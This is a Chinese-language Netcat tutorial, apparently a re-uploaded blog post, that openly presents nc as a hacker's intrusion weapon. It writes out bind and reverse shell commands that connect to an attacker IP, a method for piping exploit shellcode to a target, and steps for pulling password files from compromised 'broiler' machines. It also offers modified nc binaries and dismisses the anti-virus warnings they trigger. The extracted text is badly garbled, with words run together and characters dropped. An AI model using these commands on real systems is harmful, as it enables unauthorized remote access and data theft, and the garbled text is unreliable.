瑞士軍刀NC與使用教程_第1頁
瑞士軍刀NC與使用教程_第2頁
瑞士軍刀NC與使用教程_第3頁
瑞士軍刀NC與使用教程_第4頁
瑞士軍刀NC與使用教程_第5頁
已閱讀5頁,還剩3頁未讀 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

瑞士軍刀NC下載與使用教程”.nc.exetelnet正由于它的強大功能使得它在入侵時被廣泛應用,成為黑客們的必備武器之一.我把最近收集的nc.exe的使用方法整理了一下,發(fā)給大家.另外還找到了一款改編后的可視化的nc,也供給應大家.========================================================軟件介紹:工具名:NetcatHobbit&&ChrisWysopal類別:開放源碼[v1.10NT]========================================================參數(shù)介紹:*nc.exe-h*即可看到各參數(shù)的使用方法。根本格式:nc[-options]hostnameport[s][ports]?nc-l-pport[options][hostname][port]-d后臺模式-eprog程序重定向,一旦連接,就執(zhí)行[危急!!]-ggatewaysource-routinghoppoint[s],upto8-Gnumsource-routingpointer:4,8,12,?-h幫助信息-isecs延時的間隔-l監(jiān)聽模式,用于入站連接-L連接關閉后,仍舊連續(xù)監(jiān)聽-nIPhostname-ofile16-pport本地端口號-r隨機本地及遠程端口-saddr本地源地址-tTELNET-uUDP-v具體輸出–用兩個-v-wsecstimeout-z將輸入輸出關掉–用于掃描時端口的表示方法可寫為M-N的范圍格式。========================================================根本用法:REMOTE格式:nc-nvv192.168.x.x80192.168.x.xTCP80格式:nc-l-p80講解:監(jiān)聽本機的TCP80端口掃描遠程主機,例子:格式:nc-nvv-w2-z192.168.x.x80-445192.168.x.xTCP80TCP445REMOTESHELL,例子:格式:nc-l-p5354-t-ec:winntsystem32cmd.exeREMOTECMDSHELLREMOTETCP5354REMOTESHELL格式:nc-t-ec:winntsystem32cmd.exe192.168.x.x5354REMOTECMDSHELL192.168.x.xTCP5354以上為最根本的幾種用法〔其實NC的用法還有很多,當協(xié)作管道命令”|”與重定向命令”<”、”>”等等命令功能更強大??〕。========================================================高級用法:作攻擊程序用,例子:1:type.exec:exploit.txt|nc-nvv192.168.x.x802:nc-nvv192.168.x.x80<c:exploit.txt80*c:exploit.txt*的內容(兩種格式確有一樣的效果,真是有異曲同工之妙.附:*c:exploit.txt*為shellcode等[1],例子:格式:nc-L-p80*-L*Lctrl+c[2],例子:格式:nc-L-p80>c:log.txt講解:使用*-L*可以不停地監(jiān)聽某一個端口,直到ctrl+c*c:log.txt*中,假設把*>**>>*即可以追加日志附:*c:log.txt*為日志等[3],例子:1:nc-L-p80<c:honeypot.txt2:type.exec:honeypot.txt|nc-L-p80ctrl+c*c:honeypot.txt*的內容*送*入其管道中后門victimmachine://受害者的機器nc-l-pport-ecmd//win2023nc-l-pport-e/bin/sh//unix,linuxattackermachine://攻擊者的機器.shell。11)反向連接attackermachine://sql2,遠程溢出,webdavx3nc-vv-l-pportvictimmachine:nc-ecmdattackerip-pportnc-e/bin/shattackerip-pport或者:attackermachine:nc-vv-l-pport1/*用于輸入*/nc-vv-l-pprot2/*用于顯示*/victimmachine:ncattacker_ipport1 cmd ncattacker_ipport2ncattacker_ipport1 /bin/sh ncattacker_ipport2s〔nc-L-p139-d-ecmd-s對方機器IP〕ncNETBIOS。傳送文件:從肉雞拖密碼文件回來.nc-d-l-pport<pathfiledest/*attackermachine*/shellnc-vvattacker_ipport>pathfile.txt/*victimmachine*/Ctrl+C//guicmdFTPCrl+C.上傳命令文件到肉雞nc-vv-l-pport>pathfile.txt Ctrl+C退出nc-dvictim_ipport<pathfiledest /*attackermachine*/可以shell執(zhí)行shellascii,binipCtrl+Cnc.或者只有再次連接使用pskill殺掉進程.但是是否釋放傳輸文件翻開的句柄了?端口數(shù)據(jù)抓包.nc-vv-w2-otest.txt“:///“8021-15<000000583530302053796e746178206572726f72#500Syntaxerror<000000682c20636f6d6d616e6420222220756e72#,command“”unr<0000007865636f676e697a65642e0d0a#ecognized?<00000084830000018f#?..telnet,自動批處理。ncvictim_ipport<pathfiled /*victimmachine*/顯示執(zhí)行過程.nc-vvvictim_ipport<pathfiled /*victimmachine*/nc-dvictim_ipport<pathfiled安靜模式. filed passwordcd%windir%echo[]=[%windir%]c:cdmdtestcd/d%windir%system32netstopsksockserversnake-configport11111netstartsksockserverexit附件:nc.exe(59392Byte)附件:mvnc.exe(188928Byte)圖片附件:Tags:nc,下載,瑞士軍刀ThisentrywaspostedonWednesday,February7th,2023at3:38pmandisfiledunder安全.YoucanfollowanyresponsestothisentrythroughtheRSS2.0feed.Youcanleavearesponseortrackbackfromyourownsite.7ResponsestoNC1.abcSays:March17th,2023at2:04pmncyouduma?makerSays:March18th,2023at5:30am暈倒,固然沒有了,第一個是原版nc,第2個是被改造過的可視化nc.都是我自己用的東西.Says:March25th,2023at3:24am~~~當真,哈哈,感謝你,王墨~~請教Says:March26th,2023at4:34amncshellmakerSays:April5th,2023at1:10pm這個問題就很難答復了,假設沒有連接,監(jiān)聽一年都是白費?6.fdfdSays:September6th,2023at8:57am靠,剛點鏈接立馬病毒報警7.makerSays:September8th,2023at10:07am不懂不要亂說,誰都知道nc多數(shù)是用來發(fā)動攻擊的,殺毒軟件固然也不傻.假設報警就是有病毒那估量這個世界上就沒有人下木馬了,下灰鴿子安裝包的時候也會報警.LeaveaReplyName(required)Mail(willnotbepublished)(required)WebsiteSubmitCommentSubmitComments關于我留言簿聯(lián)系我Categories代碼作品其他共享安全宣傳技術日記相冊筆記ArchivesApril2023(1)March2023(4)February2023(1)January2023(2)October2023(1)August2023(1)oJune2023(2)February2023(1)December2023(1)October2023(3)September2023(3)August2023(5)oJuly2023(1)oJune2023(1)oMay2023(2)April2023(5)December2023(2)November2023(3)September2023(8)oJuly2023(2)oJune2023(13)oMay2023(5)March2023(2)February2023(14)January2023(9)December2023(10)November2023(4)September

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論